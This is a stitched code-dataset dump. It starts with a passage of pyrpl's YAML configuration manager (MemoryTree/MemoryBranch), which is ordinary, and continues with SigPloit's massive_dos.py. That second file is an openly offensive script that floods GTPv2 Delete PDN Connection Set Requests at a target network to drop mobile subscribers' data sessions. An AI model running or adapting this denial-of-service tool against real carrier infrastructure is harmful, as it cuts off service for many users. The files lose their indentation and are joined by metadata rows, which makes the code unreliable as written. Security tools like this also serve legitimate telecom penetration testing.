# accidentally, we may pass a MemoryTree object instead of file
if isinstance(filename, MemoryTree):
return filename._filename
# get extension right
if not filename.endswith(".yml"):
filename = filename + ".yml"
# see if filename is found with given path, or in user_config or in default_config
p, f = os.path.split(filename)
for path in [p, user_config_dir, default_config_dir]:
file = os.path.join(path, f)
if os.path.isfile(file):
return file
# file not existing, place it in user_config_dir
return os.path.join(user_config_dir, f)
def get_config_file(filename=None, source=None):
""" returns the path to a valid, existing config file with possible source specification """
# if None is specified, that means we do not want a persistent config file
if filename is None:
return filename
# try to locate the file
filename = _get_filename(filename)
if os.path.isfile(filename): # found a file
p, f = os.path.split(filename)
if p == default_config_dir:
# check whether path is default_config_dir and make a copy in
# user_config_dir in order to not alter original files
dest = os.path.join(user_config_dir, f)
copyfile(filename, dest)
return dest
else:
return filename
# file not existing, try to get it from source
if source is not None:
source = _get_filename(source)
if os.path.isfile(source): # success - copy the source
logger.debug("File " + filename + " not found. New file created from source '%s'. "%source)
copyfile(source,filename)
return filename
# still not returned -> create empty file
with open(filename, mode="w"):
pass
logger.debug("File " + filename + " not found. New file created. ")
return filename
class MemoryBranch(object):
"""Represents a branch of a memoryTree
All methods are preceded by an underscore to guarantee that tab
expansion of a memory branch only displays the available subbranches or
leaves. A memory tree is a hierarchical structure. Nested dicts are
interpreted as subbranches.
Parameters
----------
parent: MemoryBranch
parent is the parent MemoryBranch
branch: str
branch is a string with the name of the branch to create
defaults: list
list of default branches that are used if requested data is not
found in the current branch
Class members
-----------
all properties without preceeding underscore are config file entries
_data: the raw data underlying the branch. Type depends on the
loader and can be dict, OrderedDict or CommentedMap
_dict: similar to _data, but the dict contains all default
branches
_defaults: list of MemoryBranch objects in order of decreasing
priority that are used as defaults for the Branch.
Changing the default values from the software will replace
the default values in the current MemoryBranch but not
alter the underlying default branch. Changing the
default branch when it is not overridden by the current
MemoryBranch results in an effective change in the branch.
_keys: same as _dict._keys()
_update: updates the branch with another dict
_pop: removes a value/subbranch from the branch
_root: the MemoryTree object (root) of the tree
_parent: the parent of the branch
_branch: the name of the branch
_get_or_create: creates a new branch and returns it. Same as branch[newname]=dict(), but also supports nesting,
e.g. newname="lev1.lev2.level3"
_fullbranchname: returns the full path from root to the branch
_getbranch: returns a branch by specifying its path, e.g. 'b1.c2.d3'
_rename: renames the branch
_reload: attempts to reload the data from disc
_save: attempts to save the data to disc
If a subbranch or a value is requested but does not exist in the current MemoryTree, a KeyError is raised.
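
    Minimal usage sketch (the key names 'scope' and 'duration' below are purely
    illustrative and not part of any pyrpl configuration schema)::

        root = MemoryTree('example.yml')  # file located or created via get_config_file()
        root.scope = dict()               # creates the sub-branch 'scope'
        root.scope.duration = 0.01        # leaf write, persisted through _save()
        root['scope']['duration']         # dict notation reads the same entry -> 0.01
        root._get_or_create('a.b.c')      # nested sub-branches created in one call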
"""
def __init__(self, parent, branch):
self._parent = parent
self._branch = branch
self._update_instance_dict()
def _update_instance_dict(self):
data = self._data
if isinstance(data, dict):
            for k in list(self.__dict__.keys()):
if k not in data and not k.startswith('_'):
self.__dict__.pop(k)
for k in data.keys():
# write None since this is only a
# placeholder (__getattribute__ is overwritten below)
self.__dict__[k] = None
@property
def _data(self):
""" The raw data (OrderedDict) or Mapping of the branch """
return self._parent._data[self._branch]
@_data.setter
def _data(self, value):
logger.warning("You are directly modifying the data of MemoryBranch"
" %s to %s.", self._fullbranchname, str(value))
self._parent._data[self._branch] = value
def _keys(self):
if isinstance(self._data, list):
return range(self.__len__())
else:
return self._data.keys()
def _update(self, new_dict):
if isinstance(self._data, list):
raise NotImplementedError
self._data.update(new_dict)
self._save()
# keep auto_completion up to date
for k in new_dict:
self.__dict__[k] = None
def __getattribute__(self, name):
""" implements the dot notation.
Example: self.subbranch.leaf returns the item 'leaf' of 'subbranch' """
if name.startswith('_'):
return super(MemoryBranch, self).__getattribute__(name)
else:
# convert dot notation into dict notation
return self[name]
def __getitem__(self, item):
"""
__getitem__ bypasses the higher-level __getattribute__ function and provides
direct low-level access to the underlying dictionary.
This is much faster, as long as no changes have been made to the config
file.
"""
self._reload()
# if a subbranch is requested, iterate through the hierarchy
if isinstance(item, str) and '.' in item:
item, subitem = item.split('.', 1)
return self[item][subitem]
else: # otherwise just return what we can find
attribute = self._data[item] # read from the data dict
if isbranch(attribute): # if the object can be expressed as a branch, do so
return MemoryBranch(self, item)
else: # otherwise return whatever we found in the data dict
return attribute
def __setattr__(self, name, value):
if name.startswith('_'):
super(MemoryBranch, self).__setattr__(name, value)
else: # implemment dot notation
self[name] = value
def __setitem__(self, item, value):
"""
creates a new entry, overriding the protection provided by dot notation
if the value of this entry is of type dict, it becomes a MemoryBranch
new values can be added to the branch in the same manner
"""
# if the subbranch is set or replaced, to this in a specific way
if isbranch(value):
# naive way: self._data[item] = dict(value)
# rather: replace values in their natural order (e.g. if value is OrderedDict)
# make an empty subbranch
if isinstance(value, list):
self._set_data(item, [])
subbranch = self[item]
# use standard setter to set the values 1 by 1 and possibly as subbranch objects
for k, v in enumerate(value):
subbranch[k] = v
else: # dict-like
# makes an empty subbranch
self._set_data(item, dict())
subbranch = self[item]
# use standard setter to set the values 1 by 1 and possibly as subbranch objects
for k, v in value.items():
subbranch[k] = v
#otherwise just write to the data dictionary
else:
self._set_data(item, value)
if self._root._WARNING_ON_SAVE or self._root._ERROR_ON_SAVE:
logger.warning("Issuing call to MemoryTree._save after %s.%s=%s",
self._branch, item, value)
self._save()
# update the __dict__ for autocompletion
self.__dict__[item] = None
def _set_data(self, item, value):
"""
helper function to manage setting list entries that do not exist
"""
if isinstance(self._data, list) and item == len(self._data):
self._data.append(value)
else:
# trivial case: _data is dict or item within list length
# and we can simply set the entry
self._data[item] = value
def _pop(self, name):
"""
remove an item from the branch
"""
value = self._data.pop(name)
if name in self.__dict__.keys():
self.__dict__.pop(name)
self._save()
return value
def _rename(self, name):
self._parent[name] = self._parent._pop(self._branch)
self._save()
def _get_or_create(self, name):
"""
creates a new subbranch with name=name if it does not exist already
and returns it. If name is a branch hierarchy such as
"subbranch1.subbranch2.subbranch3", all three subbranch levels
are created
"""
if isinstance(name, int):
if name == 0 and len(self) == 0:
# instantiate a new list - odd way because we must
self._parent._data[self._branch] = []
# if index <= len, creation is done automatically if needed
# otherwise an error is raised
if name >= len(self):
self[name] = dict()
return self[name]
else: # dict-like subbranch, support several sublevels separated by '.'
# chop name into parts and iterate through them
currentbranch = self
for subbranchname in name.split("."):
# make new branch if applicable
if subbranchname not in currentbranch._data.keys():
currentbranch[subbranchname] = dict()
# move into new branch in case another subbranch will be created
currentbranch = currentbranch[subbranchname]
return currentbranch
def _erase(self):
"""
Erases the current branch
"""
self._parent._pop(self._branch)
self._save()
@property
def _root(self):
"""
returns the parent highest in hierarchy (the MemoryTree object)
"""
parent = self
while parent != parent._parent:
parent = parent._parent
return parent
@property
def _fullbranchname(self):
parent = self._parent
branchname = self._branch
while parent != parent._parent:
branchname = parent._branch + '.' + branchname
parent = parent._parent
return branchname
def _reload(self):
""" reload data from file"""
self._parent._reload()
def _save(self):
""" write data to file"""
self._parent._save()
def _get_yml(self, data=None):
"""
:return: returns the yml code for this branch
"""
return save(self._data if data is None else data).decode('utf-8')
def _set_yml(self, yml_content):
"""
:param yml_content: sets the branch to yml_content
:return: None
"""
branch = load(yml_content)
self._parent._data[self._branch] = branch
self._save()
def __len__(self):
return len(self._data)
def __contains__(self, item):
return item in self._data
def __repr__(self):
return "MemoryBranch(" + str(self._keys()) + ")"
def __add__(self, other):
"""
makes it possible to add list-like memory tree to a list
"""
if not isinstance(self._data, list):
raise NotImplementedError
return self._data + other
def __radd__(self, other):
"""
makes it possible to add list-like memory tree to a list
"""
if not isinstance(self._data, list):
raise NotImplementedError
return other + self._data
class MemoryTree(MemoryBranch):
"""
The highest level of a MemoryBranch construct. All attributes of this
object that do not start with '_' are other MemoryBranch objects or
Leaves, i.e. key - value pairs.
Parameters
----------
filename: str
The filename of the .yml file defining the MemoryTree structure.
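
    A minimal construction sketch (the file name is purely illustrative)::

        c = MemoryTree('pyrpl.yml')  # persistent tree, file located/created via get_config_file()
        c = MemoryTree(None)         # purely in-memory tree, nothing is ever written to disk

    Writes triggered through _save() are batched: at most one write to disk per
    _loadsavedeadtime seconds, with a QTimer flushing any pending change afterwards.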
"""
##### internal load logic:
# 1. initially, call _load() to get the data from the file
# 2. upon each inquiry of the config data, _reload() is called to
# ensure data integrity
# 3. _reload assumes a delay of _loadsavedeadtime between changing the
# config file and Pyrpl requesting the new data. That means, _reload
# will not attempt to touch the config file more often than every
# _loadsavedeadtime. The last interaction time with the file system is
# saved in the variable _lastreload. If this time is far enough in the
# past, the modification time of the config file is compared to _mtime,
# the internal memory of the last modifiation time by pyrpl. If the two
# don't match, the file was altered outside the scope of pyrpl and _load
# is called to reload it.
##### internal save logic:
# this structure will hold the data. Must define it here as immutable
# to overwrite the property _data of MemoryBranch
_data = None
_WARNING_ON_SAVE = False # flag that is used to debug excessive calls to
# save
_ERROR_ON_SAVE = False # Set this flag to true to raise
# Exceptions upon save
def __init__(self, filename=None, source=None, _loadsavedeadtime=3.0):
# never reload or save more frequently than _loadsavedeadtime because
# this is the principal cause of slowing down the code (typ. 30-200 ms)
# for immediate saving, call _save_now, for immediate loading _load_now
self._loadsavedeadtime = _loadsavedeadtime
# first, make sure filename exists
self._filename = get_config_file(filename, source)
if filename is None:
# to simulate a config file, only store data in memory
self._filename = filename
self._data = OrderedDict()
self._lastsave = time()
# create a timer to postpone to frequent savings
self._savetimer = QtCore.QTimer()
self._savetimer.setInterval(self._loadsavedeadtime*1000)
self._savetimer.setSingleShot(True)
self._savetimer.timeout.connect(self._write_to_file)
self._load()
self._save_counter = 0 # cntr for unittest and debug purposes
self._write_to_file_counter = 0 # cntr for unittest and debug purposes
# root of the tree is also a MemoryBranch with parent self and
# branch name ""
super(MemoryTree, self).__init__(self, "")
@property
def _buffer_filename(self):
""" makes a temporary file to ensure modification of config file is atomic (double-buffering like operation...)"""
return self._filename + '.tmp'
def _load(self):
""" loads data from file """
if self._filename is None:
# if no file is used, just ignore this call
return
logger.debug("Loading config file %s", self._filename)
# read file from disc
with open(self._filename) as f:
self._data = load(f)
# store the modification time of this file version
self._mtime = os.path.getmtime(self._filename)
# make sure that reload timeout starts from this moment
self._lastreload = time()
# empty file gives _data=None
if self._data is None:
self._data = OrderedDict()
# update dict of the MemoryTree object
to_remove = []
# remove all obsolete entries
for name in self.__dict__:
if not name.startswith('_') and name not in self._data:
to_remove.append(name)
for name in to_remove:
self.__dict__.pop(name)
# insert the branches into the object __dict__ for auto-completion
self.__dict__.update(self._data)
def _reload(self):
"""
reloads data from file if file has changed recently
"""
# first check if a reload was not performed recently (speed up reasons)
if self._filename is None:
return
# check whether reload timeout has expired
if time() > self._lastreload + self._loadsavedeadtime:
# prepare next timeout
self._lastreload = time()
logger.debug("Checking change time of config file...")
if self._mtime != os.path.getmtime(self._filename):
                logger.debug("Loading because mtime %s != filetime %s",
                             self._mtime, os.path.getmtime(self._filename))
self._load()
else:
logger.debug("... no reloading required")
def _write_to_file(self):
"""
Immmediately writes the content of the memory tree to file
"""
# stop save timer
if hasattr(self, '_savetimer') and self._savetimer.isActive():
self._savetimer.stop()
self._lastsave = time()
self._write_to_file_counter += 1
logger.debug("Saving config file %s", self._filename)
if self._filename is None:
# skip writing to file if no filename was selected
return
else:
if self._mtime != os.path.getmtime(self._filename):
logger.warning("Config file has recently been changed on your " +
"harddisk. These changes might have been " +
"overwritten now.")
# we must be sure that overwriting config file never destroys existing data.
# security 1: backup with copyfile above
copyfile(self._filename,
self._filename + ".bak") # maybe this line is obsolete (see below)
# security 2: atomic writing such as shown in
# http://stackoverflow.com/questions/2333872/atomic-writing-to-file-with-python:
try:
f = open(self._buffer_filename, mode='w')
save(self._data, stream=f)
f.flush()
os.fsync(f.fileno())
f.close()
os.unlink(self._filename)
os.rename(self._buffer_filename, self._filename)
except:
copyfile(self._filename + ".bak", self._filename)
logger.error("Error writing to file. Backup version was restored.")
raise
# save last modification time of the file
self._mtime = os.path.getmtime(self._filename)
def _save(self, deadtime=None):
"""
A call to this function means that the state of the tree has changed
and needs to be saved eventually. To reduce system load, the delay
between two writes will be at least deadtime (defaults to
self._loadsavedeadtime if None)
"""
if self._ERROR_ON_SAVE:
raise UnexpectedSaveError("Save to config file should not "
"happen now")
if self._WARNING_ON_SAVE:
logger.warning("Save counter has just been increased to %d.",
self._save_counter)
self._save_counter += 1 # for unittest and debug purposes
if deadtime is None:
deadtime = self._loadsavedeadtime
# now write current tree structure and data to file
if self._lastsave + deadtime < time():
self._write_to_file()
else:
# make sure saving will eventually occur by launching a timer
if not self._savetimer.isActive():
self._savetimer.start()
@property
def _filename_stripped(self):
try:
return os.path.split(self._filename)[1].split('.')[0]
except:
return 'default'
| gpl-3.0 | 8,099,003,794,063,674,000 | 39.949843 | 122 | 0.601814 | false |
SigPloiter/SigPloit | gtp/attacks/dos/massive_dos.py | 1 | 5715 | #!/usr/bin/env python
# encoding: utf-8
# massive_dos.py
#
# Copyright 2018 Rosalia d'Alessandro
#
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
from optparse import OptionParser
from gtp_v2_core.utilities.configuration_parser import parseConfigs
from commons.message_handler import MessageHandler
from commons.globals import message_queue
__all__ = []
__version__ = 0.1
GTP_PORT = 2123
DEFAULT_MSG_FREQ = 20
DEFAULT_SLEEPTIME = 1
DEBUG = 0
##
## ATTACKING TOOL
##
## @brief Main file to execute the script.
##
## This file can test a DoS attack sending a Delete PDN Connection Set Request
## (101) for a specific FQ-CSID.FQ-CSID is calculated using node type id, mcc, mnc and source ip
## provided in the config file.
##
## Use the -h option to enter the help menu and determine what to do.
##
## Basic usage examples:
## * $ python massive_dos.py -v -c conf_file.cnf [-c conf2.cnf ...] -r <remote ip>
# act as a client connecting to <remote-host-ip>
##
## * $ python massive_dos.py -lv -c conf_file.cnf [-c conf2.cnf ...] -r <remote ip>
##
## act as a server listening on 0.0.0.0 and accepting replies from <remote-host-ip>
##
## Example configuration file: MassiveDos.cnf
## Pre-conditions: known valid FQ-CSID
def main(argv=None):
'''Command line options.'''
program_name = os.path.basename(sys.argv[0])
program_version = "v0.1"
program_version_string = '%%prog %s' % (program_version)
    program_license = "Copyright 2017 Rosalia d'Alessandro\n" \
                      "Licensed under the Apache License 2.0\n" \
                      "http://www.apache.org/licenses/LICENSE-2.0"
if argv is None:
argv = sys.argv[1:]
lstn = None
try:
# setup option parser
parser = OptionParser(version=program_version_string, description=program_license)
parser.add_option("-v", "--verbose", dest="verbose", action="count", help="set verbosity level [default: %default]")
parser.add_option("-c", "--config", dest="config_file", help="the configuration file")
parser.add_option("-r", "--remote_net", dest="remote_net",
help="remote network e.g. 10.0.0.0/24, 10.0.0.1/32")
parser.add_option("-l", "--listening", dest = "listening_mode",
action = "count", help = "start also a GTP_C listener")
# set defaults
parser.set_defaults(listening_mode=False,
config_file="../config/MassiveDoS.cnf",
verbose = False)
# process options
(opts, args) = parser.parse_args(argv)
        is_verbose = opts.verbose
listening_mode = opts.listening_mode
        msg_freq = DEFAULT_MSG_FREQ
remote_net = opts.remote_net
sleep_time = DEFAULT_SLEEPTIME
if listening_mode and remote_net == None:
print "remote network (e.g. 10.0.0.0/24, 10.0.0.1/32) is required"
return
# MAIN BODY #
if opts.config_file == "" :
print "Error: missed config file"
return
config = parseConfigs(opts.config_file)
msgs = config.get_unpacked_messages()
lstn = MessageHandler(messages = msgs, peer = remote_net,
isVerbose = is_verbose,
listening_mode = listening_mode,
msgs_freq = msg_freq, wait_time = sleep_time)
if lstn :
lstn.daemon = True
lstn.start()
lstn.join()
lstn.stop()
print "Sent %d GTPV2 messages"%len(message_queue)
except Exception, e:
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help")
print "Exception %s"%str(e)
if lstn :
lstn.stop()
return 2
if __name__ == "__main__":
if DEBUG:
sys.argv.append("-v")
sys.exit(main())
| mit | -1,503,131,306,233,485,600 | 37.355705 | 124 | 0.607349 | false |